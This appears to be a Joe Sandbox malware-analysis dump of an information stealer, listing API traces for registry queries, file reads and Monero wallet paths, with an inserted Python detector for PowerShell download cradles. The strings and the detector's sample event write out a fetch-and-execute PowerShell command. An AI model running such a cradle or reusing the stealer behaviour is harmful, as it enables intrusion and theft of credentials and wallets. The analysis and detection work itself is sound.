                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                  • Instruction ID: df9d4c486a0a8c269230634400afcae761c012007c2b8a12a3b58eb5f287d778
                  • Opcode Fuzzy Hash: a0b56d8e27978c86d6b938c089e6b6d001feca56a095a2070c67813b62465333
                  • Instruction Fuzzy Hash: ED210A7190021C9BDB64DB54DC85FE9B3B8FB48700F04C198E609A6180DF716A85DFE5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D476A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D476AB
                  • RegOpenKeyExA.ADVAPI32(80000002,00AEC320,00000000,00020119,00000000), ref: 00D476DD
                  • RegQueryValueExA.ADVAPI32(00000000,00AFDE70,00000000,00000000,?,000000FF), ref: 00D476FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D47708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                  • Instruction ID: 08db1175388a9351d8f3cee2affad0615e3a42b9e829ddcc0f9e8650bde4c370
                  • Opcode Fuzzy Hash: a328e1141c2c01a32271ec93e3064dc3449d232884625a6ae53a4418fd1d50a1
                  • Instruction Fuzzy Hash: 110162B5A44208BFDB00DBE4DC49F6DB7B8EB88701F104454FA08D7291D77099449F63
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D4773B
                  • RegOpenKeyExA.ADVAPI32(80000002,00AEC320,00000000,00020119,00D476B9), ref: 00D4775B
                  • RegQueryValueExA.ADVAPI32(00D476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D4777A
                  • RegCloseKey.ADVAPI32(00D476B9), ref: 00D47784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                  • Instruction ID: db51f9f5abcc00c6b8a5123e796caee5609ed7d59fe87d07c41ac0590ed7d6b8
                  • Opcode Fuzzy Hash: 49ced265fe04f99129ed51ad0e83ee729a41273094271429fa881011866cde97
                  • Instruction Fuzzy Hash: DB0144B5A40308BBDB00DBE0DC49FAEB7B8EB44701F004554FA09A7281D67055409B63
                  APIs
                  • memset.MSVCRT ref: 00D440D5
                  • RegOpenKeyExA.ADVAPI32(80000001,00AFDD20,00000000,00020119,?), ref: 00D440F4
                  • RegQueryValueExA.ADVAPI32(?,00AFE398,00000000,00000000,00000000,000000FF), ref: 00D44118
                  • RegCloseKey.ADVAPI32(?), ref: 00D44122
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44147
                  • lstrcat.KERNEL32(?,00AFE458), ref: 00D4415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                  • Instruction ID: 11dcba6ed4d712a5339298d4114b35f22c812935002097a905f20414dc60dc9a
                  • Opcode Fuzzy Hash: 2bc862e23049522353f557efbe5a534fc225ec1847c73ec0f35945cba9fd7dcf
                  • Instruction Fuzzy Hash: 8C4136B690010C6BDB14FBA0DC56FEE737DEB88300F404558B61A96181EA755BC89BB3
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                  • LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                  • Instruction ID: be05ee93d8a94c722bc6773110b992d093698e7882180927b8ab200ae81ad430
                  • Opcode Fuzzy Hash: c1bbf4fb4f0a8a89cdef0a3dbe71d5d8b089705e6b0663f71b5ddaadfc43a708
                  • Instruction Fuzzy Hash: B7313C74A0020DEFDB14DFA4C895BAEB7B5FF48305F148258E905A7290D774A981DFB2
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: 74d4e9b19bb150b85e7658e88690bb889d9a80235ebd71d66595e01b53cbf74e
                  • Instruction ID: 1830182082e0a2632a38659c4f96f47bf2ccabbdc39f95fb5b10fabe7bfcb2e4
                  • Opcode Fuzzy Hash: 74d4e9b19bb150b85e7658e88690bb889d9a80235ebd71d66595e01b53cbf74e
                  • Instruction Fuzzy Hash: DD41077111179CAFDB218B24CC84FFBBBE99F45705F1854E8E9CA86182E2719A45CF30
                  APIs
                  • lstrcat.KERNEL32(?,00AFE320), ref: 00D447DB
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44801
                  • lstrcat.KERNEL32(?,?), ref: 00D44820
                  • lstrcat.KERNEL32(?,?), ref: 00D44834
                  • lstrcat.KERNEL32(?,00AEB7E8), ref: 00D44847
                  • lstrcat.KERNEL32(?,?), ref: 00D4485B
                  • lstrcat.KERNEL32(?,00AFDB60), ref: 00D4486F
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D48D90: GetFileAttributesA.KERNEL32(00000000,?,00D31B54,?,?,00D5564C,?,?,00D50E1F), ref: 00D48D9F
                    • Part of subcall function 00D44570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                    • Part of subcall function 00D44570: RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                    • Part of subcall function 00D44570: wsprintfA.USER32 ref: 00D445A6
                    • Part of subcall function 00D44570: FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                  • Instruction ID: cbdca2e526c23221ac579e98c5fd5e19b95147cbfaace7e5a6be44092c5b7088
                  • Opcode Fuzzy Hash: fa0c21dca2792c8089cc7541b335d8ae4b680f8649a7830b40f09637ec973265
                  • Instruction Fuzzy Hash: E5313EB694021CABCB14FBA0DC85EED7378AB98700F404589B35996081EE7496C9DFB6
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D42D85
                  Strings
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00D42CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00D42D04
                  • <, xrefs: 00D42D39
                  • ')", xrefs: 00D42CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                  • Instruction ID: 76a403fec2088b30f03c214b8685a66899c9ec4ce88e5532f81a417a58e24f91
                  • Opcode Fuzzy Hash: 4be129be25f13c3852b033398364797d2033d1be61a78656fdfb82cc139fb60b
                  • Instruction Fuzzy Hash: 7241AA71C502189BEB14EBA4C892BEDBB78EF14304F504119F516A7192EF746A4ACFB2
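The function above assembles a classic PowerShell download cradle (`-nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"`) and launches it through ShellExecuteEx, using the 32-bit host under SysWOW64. The detector below is an added example written for this report, not code from the sample or from Joe Sandbox: it scores process-creation events (Image / CommandLine / ParentImage fields, as Sysmon event 1 would carry them) for the cradle markers, pulls the staged URL out, and records the SysWOW64 host as a weak extra signal. The three sample events are constructed; the URL in the first one is a documentation address, since the real C2 URL is not shown in this section.

```python
import re
from typing import Dict, List

# Markers of the download cradle seen in the stealer's string table:
#   -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
CRADLE_MARKERS = [
    (re.compile(r"(?i)(?<!\S)-no(p|profile)\b"), "no-profile switch"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "Invoke-Expression"),
    (re.compile(r"(?i)new-object\s+(system\.)?net\.webclient"), "Net.WebClient"),
    (re.compile(r"(?i)\.downloadstring\s*\("), "DownloadString"),
]
URL_RE = re.compile(r"(?i)\.downloadstring\s*\(\s*['\"]([^'\"]+)['\"]")


def analyze_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event (Image / CommandLine / ParentImage)."""
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    result: Dict[str, object] = {"suspicious": False, "reasons": [], "url": None,
                                 "parent": ev.get("ParentImage", "")}
    if not image.lower().endswith("\\powershell.exe"):
        return result
    reasons = [label for rx, label in CRADLE_MARKERS if rx.search(cmd)]
    # The sample hard-codes the SysWOW64 host: a 32-bit PowerShell on a 64-bit
    # box is unusual for interactive use, so record it as a weak signal.
    if "\\syswow64\\windowspowershell\\" in image.lower():
        reasons.append("32-bit (SysWOW64) PowerShell host")
    m = URL_RE.search(cmd)
    result["reasons"] = reasons
    result["url"] = m.group(1) if m else None
    # Require both "execute" and "fetch" markers so a profile-less admin
    # script alone does not fire the rule.
    result["suspicious"] = "Invoke-Expression" in reasons and "DownloadString" in reasons
    return result


def analyze_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [analyze_event(ev) for ev in events]


# Constructed sample events (not taken from the report). 198.51.100.7 is a
# TEST-NET-2 documentation address standing in for the unknown C2 URL.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"''',
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Temp"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for r in analyze_events(SAMPLE_EVENTS):
        print(r)
```

Only the first event is flagged; the benign `-NoProfile` invocation collects one reason but is not marked suspicious. In a real pipeline the extracted URL and the non-browser parent (here `file.exe`) are what you pivot on.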
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00D39F41
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 8dfd1ab80e0b8261323c082318c1e4101fc0798c23002ad08a0ca4e977050a14
                  • Instruction ID: b4b56dae56f75f994cb39c6fe9078af753c02b20cfb4e65431284d58ca5bd47a
                  • Opcode Fuzzy Hash: 8dfd1ab80e0b8261323c082318c1e4101fc0798c23002ad08a0ca4e977050a14
                  • Instruction Fuzzy Hash: FA612F75A50248AFDB28EFA8CC96FED7775EF44304F008018F90A5B195EB746A09CB72
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00D4696C
                  • sscanf.NTDLL ref: 00D46999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00D469C0
                  • ExitProcess.KERNEL32 ref: 00D469DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
                  • Instruction ID: c362a15fb8cab86a497a5ea3b8dd9283ffed275551dd6f365caa3312409891c6
                  • Opcode Fuzzy Hash: e5f1286be4eeeac802f26d9a9dd0655b6998e43d7a396e129cfca5319dd328c9
